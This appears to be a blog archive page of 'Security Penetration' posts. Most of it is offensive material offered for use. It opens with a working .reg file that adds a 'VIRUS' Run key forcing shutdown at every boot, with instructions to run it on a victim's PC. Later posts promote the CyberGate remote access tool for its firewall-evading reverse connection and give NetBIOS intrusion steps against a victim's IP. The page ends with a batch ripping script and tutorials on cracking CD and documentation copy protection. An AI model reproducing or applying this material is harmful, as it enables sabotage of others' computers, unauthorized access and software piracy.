Geek'sRepublic
this site the web

Photos

image
image
image
Showing posts with label Security Penetration. Show all posts
Showing posts with label Security Penetration. Show all posts

Let your enemy down !

Got any problem with your friend got to make them pay here is an easy way, but never use it unless it is necessary.
put this following text in a .reg file and run it in the victims pc:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

DONT PUT IT IN your COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you,
start windows in safe mode, and open registry editor by typing
REGEDIT in start->run. navigate to
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
and remove the string value named VIRUS,
restart you computer.
You can also put this in a javascript code,
just add this code to your webpage

CyberGate



What is CyberGate:

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed by our experienced team. 

What it can do :

CyberGate was built to be a tool for various  possible applications, ranging from assisting Users with routine maintenance tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access.
CyberGate achieves this though it's abundant array of features. A few of which are illustrated below :
[+] Automatically map ports if your router supports uPnP;
[+] Multi-Threaded : allowing for multiple clients to be connected, along with increased reliability.
[+] Reverse Connection :  Some of the listed advantages of a reverse connection -  
# Outgoing connections generally are less treating, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote's computer is connecting to the remote administrator, one does not need to know the remote's IP address in order to connect.

NetBios hacking for windows 95/98/ME/NT/XP

Step 1
Get a IP (range) scanner. (superscanner is a fast one).
Scan the victim's ip on TCP/IP port 139
Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok
this is what you see: c:windows>
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:windows>nbtstat -a 255.255.255.255
If you see this your in:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered

How to full rip by GR's BlackAce

Hi , welcome to Geek's Republic aka GR .
Today ,I will show you how to rip games,videos and photos.

What you required are :

  • Notepad (Sure you have if you are using windows)
  • uha.dll(which you can download at here )
1) go to your folder option (tools>folder option) ,select view tab , uncheck hide extension for known file types then apply it.
2)open notepad ,type as below :
@echo off
ren uha.dll uha.exe
uha.exe a -m3 -r -pf -o filename F:\location 
ren uha.exe uha.dll

How crack CD protection by #WAREZFRANCE CREW

Full tutorial made by to Crack CD Protections: Full tutorial made for FOR #WAREZFRANCE
CREW, by FANATIK

 
Chapters:
1). About, Programs needed … etc.
2). The easy protection.
3). Finding the right file – and the right error.
4). Finding the right line number.
5). Editing the line.
6). Testing.
7). Quick order list.
 
Here we go (again)!
 
Chapter I: About, Programs needed … etc.

Hrp! This tutorial is written by FANATIK, member of the #WAREZFRANCE CREW. It is the
second part of my first tutorial: RiPPing
Tutorial, that explains all about RiPPing except how to crack the CD
protections… so here is the other part – how to finish the RiPPing by cracking
the protection. This will help you w/ the most basic system of protection,
called C- dilla, that is the most usual one…

Cracking Tutorial by Buckaroo Banzai [Lesson 4]

Revision 1
          Added for revision 1 -

              First, let  me  tell  you  about  a major fuckup I made.
         When I first wrote this file, I  left out a major part of the
         patch.  For all of the user who got that version,  I'm  sorry
         but even I  make  mistakes  at  3:00 in the morning.  Anyway,
         just replace the original with this updated version

                                            - Buckaroo Banzai

         >

              Hey, Buckaroo Banzai .. Cracking Guru back once again to
         help you lesser crackist learn.   This time, we will be going
         over Star Control.  This is the last lesson in  the  original
         4.  From here  on  out,  I  will  simply release lessons as I
         write them.

              I want to say a few things  about some of the groups out
         there right now.  Speed isn't everything.  I really wish that
         for example when you remove a doc check, most  of  us want it
         REMOVED.  We don't  want  to have to enter your group name or
         even typing 1 letter is to much.   We  shouldn't even see the
         menu for the doc check.  Now, I don't direct  this  to all of
         you, but there  seems  to  have  been  a move from quality to
         quickness.  Let's go back to the  days  of  SPI (and INC when
         they were first getting started) and crack right.   If  there
         is a doc check, remove it, not just fake it.

              Nuff said, on with the tutorial.

Cracking Tutorial by Buckaroo Banzai [Lesson 3]

              Oh shit, I have finally found a newer program that has
         on disk copy protection.  Good, you'all need a refresher
         course on so here it is (YO JB study hard, you might learn
         something).

              CHAMBER of the SCI-MUTANT PREISTEST (CSMP) is a really
         fucked up game but was simple to unprotect.  So, lets dive
         right in.  We will be using DEBUG here (although I used
         periscope but then shit I'm special) to do the crack.  Lets
         dive in.  When we first load CSMP (the file ERE.COM) and
         unassemble it here is what we get.

         u 100 10B

         119A:0100 8CCA          MOV DX,CS
         119A:0102 81C2C101      ADD DX,01C1
         119A:0106 52            PUSH DX
         119A:0107 BA0F00        MOV DX,000F
         119A:010A 52            PUSH DX
         119A:010B CB            RETF

Cracking Tutorial by Buckaroo Banzai [Lesson 2]

                      
             Ok , I  will  start  talking  about
         removing doc check protection schemes.  I find, the doc check
         scheme to be slightly more difficult  to  work on than normal
         INT 13 schemes.

              What is  a  doc  check.   Usually, a doc  check  when  a
         program ask the  user to enter a phrase or code supplied with
         the manual.  Now, one might think  that  "Shit,  we  can just
         type all the codes in to a textfile and upload  it  with  the
         DOCS", but that  way of thinking breaks down on programs such
         as Future Classics where there  are  6  pages  with about 200
         codes per page.   So  it is just better to remove  the  check
         completely.

              In this  primer, I will get in to the theory of removing
         a doc check, then start with  a  simple  example  (Electronic
         Art's ESCAPE FROM HELL).  Then in the next file,  I will take
         you deeper in  to  the world of doc checks and work with more
         difficult examples.  But for now, lets get started.

              A doc check, in basic theory works much like normal
         INT 13 copy protection.  Somewhere  in  the  beginning of the
         program before it really starts, the check is  made.   If the
         result is ok  (ie the user enters the correct word or phrase)
         then the program continues.  If  not, then the program simply
         exits to dos.

              Simple right,  well  not  really.   Usually,  the  input
         routine is part  of the standard input routine of the program
         so you just can't go about modify  the  call  to INT 16h (the
         keyboard interrupt) like you could with INT 13h.   So,  where
         do we start.   If  you  think back to cracking the old INT 13
         protection schemes, you would  use  a program like PCWATCH or
         TRAP13 to get a rough idea of where the call  resides.   With
         doc checks, this is really not the best way to do it.

Cracking Tutorial by Buckaroo Banzai [Lesson 1]

This summary is not available. Please click here to view the post.

Cracking Tutorial by Buckaroo Banzai [Intro]

A long time a go, in a galaxy far far away, a great
         adventure took ... What, oh sorry, wrong textfile.


              Hello my children.  Let me introduce myself, I am the
         great cracking guru BUCKAROO BANZAI (the original) and I'm
         back after a couple of years of hiding (from the Feds? from
         the IRS? No, from this girl MaryLou.  Let me tell you, she
         could ... oh well let's get back to the textfile).

              Let me tell you a little history about cracking on the
         IBMpc.  It all started about 11 years ago with an apple IIe.
         See, I owned one and always wanted to learn how to crack (I
         was already a good pirate).  Unfortunately, I just never
         could get the hang of it.

              Well anyway, then I got my PC, and right away started to
         learn to program.  Soon, I had pick up oh 4 languages one of
         which was assemble language.  So I started down the long road
         to becoming a crackist.